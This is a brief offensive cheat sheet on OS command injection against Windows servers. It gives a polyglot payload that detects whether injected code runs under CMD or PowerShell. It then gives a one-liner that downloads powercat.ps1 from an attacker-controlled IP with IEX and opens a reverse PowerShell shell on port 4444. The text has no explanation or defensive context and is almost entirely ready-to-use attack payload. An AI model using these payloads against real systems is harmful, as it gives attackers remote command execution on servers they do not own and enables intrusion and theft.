OS Command Injection

Code Snippet to check where our code is executed on windows server

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

revshell using powercat

:(dir 2>&1 *`|echo CMD);&<# rem #>IEX (New-Object System.Net.Webclient).DownloadString

("http://<ATTACKER IP>/powercat.ps1");powercat -c <ATTACKER IP> -p 4444 -e powershell